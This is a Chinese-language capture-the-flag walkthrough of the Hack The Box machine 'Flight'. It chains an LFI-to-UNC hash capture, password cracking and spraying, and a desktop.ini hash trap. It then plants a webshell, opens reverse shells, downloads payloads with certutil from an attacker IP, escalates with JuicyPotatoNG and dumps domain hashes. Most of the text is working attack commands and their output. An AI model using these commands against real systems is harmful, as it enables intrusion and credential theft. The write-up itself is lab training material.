基本信息

端口扫描

80,以及windows域常规端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ nmap -sC -sV -Pn 10.10.11.187
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 13:39 CST
Nmap scan report for 10.10.11.187
Host is up (0.21s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-07 12:42:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-11-07T12:42:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.19 seconds

80

某航空公司网站:

子域名扫描

80页面底部可以得到主域名,继续探测子域名,发现school:

1
2
3
4
5
10.10.11.187 flight.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://flight.htb/" -H 'Host: FUZZ.flight.htb' -fs 7069

school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 214ms]

school

school加hosts后访问,发现view参数,猜测LFI:

LFI

直接读index,发现代码中有各种过滤:

1
view-source:http://school.flight.htb/index.php?view=index.php

responder

但注意这是windows靶机,这些过滤并没有过滤掉UNC路径,所以开启Responder,得到svc_apache hash,破解出来密码:

1
2
3
4
5
6
7
8
9
10
11
sudo python3 Responder.py -i 10.10.14.5 -wP

http://school.flight.htb/index.php?view=//10.10.14.5/miao

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:d97722b76908e7cd:9450E5DC7E24C1C4621BD43B63122479:01010000000000000055FFBEB0F2D80122570DD2EDA78DBA0000000002000800340050005800440001001E00570049004E002D0044003300560039004D0057005400470042004F004E0004003400570049004E002D0044003300560039004D0057005400470042004F004E002E0034005000580044002E004C004F00430041004C000300140034005000580044002E004C004F00430041004C000500140034005000580044002E004C004F00430041004C00070008000055FFBEB0F2D80106000400020000000800300030000000000000000000000000300000DD878F1675772A6A6DAFDDDCC8BF586057C3E89BC8B800F8FA52C363333E663C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

S@Ss!K@*t13 (svc_apache)

SMB

使用得到的账号密码枚举smb:

users

使用得到的密码枚举用户, 之后进行密码喷洒,发现s.moon使用相同密码:

1
2
3
4
5
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users

./cme smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13

users.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
svc_apache
O.Possum
V.Stevens
D.Truff
I.Francis
W.Walker
C.Bum
M.Gold
L.Kein
G.Lors
R.Cold
S.Moon
krbtgt
Guest
Administrator

Shared

尝试使用S.Moon pexec失败,但可以发现对shared目录有写权限:

这个目录可能会有其他用户定期访问,所以尝试其他方式获取hash:

1
2
3
4
5
6
7
8
9
10
└─$ smbclient //10.10.11.187/shared -U s.moon
Password for [WORKGROUP\s.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 0.1 kb/s)
smb: \>

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:a80233880ad07bcc:A3E7491E25095F99AE86B4C2B654324E:01010000000000000055FFBEB0F2D801006A095B7D83AB570000000002000800340050005800440001001E00570049004E002D0044003300560039004D0057005400470042004F004E0004003400570049004E002D0044003300560039004D0057005400470042004F004E002E0034005000580044002E004C004F00430041004C000300140034005000580044002E004C004F00430041004C000500140034005000580044002E004C004F00430041004C00070008000055FFBEB0F2D80106000400020000000800300030000000000000000000000000300000DD878F1675772A6A6DAFDDDCC8BF586057C3E89BC8B800F8FA52C363333E663C0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

等一会儿,得到c.bum用户hash:

同样破解出来密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Tikkycoll_431012284 (c.bum)

desktop.ini

1
2
[.ShellClassInfo]
IconResource=\\10.10.14.5\miao

Web

c.bum用户可以写web目录,写webshell去访问触发,得到svc_apache shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ smbclient //10.10.11.187/web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Nov 7 21:38:38 2022
.. D 0 Mon Nov 7 21:38:38 2022
flight.htb D 0 Mon Nov 7 21:37:00 2022
school.flight.htb D 0 Mon Nov 7 21:37:00 2022
shell.php A 42 Mon Nov 7 21:38:38 2022

5056511 blocks of size 4096. 1028784 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> put shell.php
putting file shell.php as \school.flight.htb\shell.php (0.1 kb/s) (average 0.0 kb/s)
smb: \school.flight.htb\>

c.bum shell & user flag

因为已经有c.bum用户密码,所以可以直接runas执行任意命令,这个增强版的可以直接得到shell:

通过smb那边传文件,svc_apache shell中执行,得到c.bum shell:

1
.\Runascs.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.5:5555

提权信息

枚举发现本地8000端口服务,是system service:

1
2
3
4
5
6
7
8
9
10
Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4

tasklist /fi "pid eq 4"

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System 4 Services 0 156 K

转发出来查看:

1
2
3
4
5
6
# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
certutil.exe -urlcache -f http://10.10.14.5:7777/chisel.exe chisel.exe
.\chisel.exe client --max-retry-count=1 10.10.14.5:9999 R:8000:127.0.0.1:8000

是一个aspx网站,直接在对应目录c:\inetpub\development\放webshell然后通过web去触发,得到iis 服务权限:

1
certutil.exe -urlcache -f http://10.10.14.5:7777/cmdasp.aspx cmdasp.aspx

后面就是service to system,有SeImpersonatePrivilege

提权 & root flag

1
2
3
4
5
6
7
8
9
certutil.exe -urlcache -f http://10.10.14.5:7778/nc.exe nc.exe
certutil.exe -urlcache -f http://10.10.14.5:7778/JuicyPotatoNG.exe JuicyPotatoNG.exe

# allow both binaries to be run by everyone
icacls .\nc.exe /grant Everyone:F
icacls .\JuicyPotatoNG.exe /grant Everyone:F

# IIS APPPOOL\DefaultAppPool shell中执行
c:\temp\JuicyPotatoNG.exe -t * -p "C:\temp\nc.exe" -a "10.10.14.5 6666 -e cmd.exe"

后面就是加载meterpreter,读flag,hashdump:

1
certutil.exe -urlcache -f http://10.10.14.5:7777/met.exe met.exe

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
G.Lors:1604:aad3b435b51404eeaad3b435b51404ee:affa4975fc1019229a90067f1ff4af8d:::
L.Kein:1605:aad3b435b51404eeaad3b435b51404ee:4345fc90cb60ef29363a5f38e24413d5:::
M.Gold:1606:aad3b435b51404eeaad3b435b51404ee:78566aef5cd5d63acafdf7fed7a931ff:::
C.Bum:1607:aad3b435b51404eeaad3b435b51404ee:bc0359f62da42f8023fdde0949f4a359:::
W.Walker:1608:aad3b435b51404eeaad3b435b51404ee:ec52dceaec5a847af98c1f9de3e9b716:::
I.Francis:1609:aad3b435b51404eeaad3b435b51404ee:4344da689ee61b6fbbcdfa9303d324bc:::
D.Truff:1610:aad3b435b51404eeaad3b435b51404ee:b89f7c98ece6ca250a59a9f4c1533d44:::
V.Stevens:1611:aad3b435b51404eeaad3b435b51404ee:2a4836e3331ed290bd1c2fd2b50beb41:::
svc_apache:1612:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
O.Possum:1613:aad3b435b51404eeaad3b435b51404ee:68ec50916875888f44caff424cd3f8ac:::
G0$:1001:aad3b435b51404eeaad3b435b51404ee:140547f31f4dbb4599dc90ea84c27e6b:::
meterpreter >

参考资料